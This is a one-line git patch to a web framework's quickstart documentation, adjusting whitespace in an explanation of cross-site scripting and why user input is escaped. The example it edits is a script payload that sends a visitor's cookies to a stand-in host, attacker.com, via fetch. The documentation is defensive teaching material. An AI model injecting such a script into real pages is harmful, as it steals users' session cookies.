From 00c3980eeabda4224383313f5023b3e2ea759b52 Mon Sep 17 00:00:00 2001
From: ahmet0033 <ahmet.gr3300@gmail.com>
Date: Tue, 17 Mar 2026 16:17:15 +0300
Subject: [PATCH] Update quickstart.rst

---
 docs/quickstart.rst | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index 52a239bd..9f53fb41 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
@@ -148,7 +148,7 @@ how you're using untrusted data.
         return f"Hello, {escape(name)}!"
 
 For example, if a web app displays user reviews without escaping input, an attacker could submit
-``<script>fetch('https://attacker.com?cookie=' + document.cookie);</script>``. 
+``<script>fetch('https://attacker.com?cookie=' + document.cookie); </script>``. 
 Now, any user viewing that page would unknowingly send their cookies to the attacker. 
 This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering.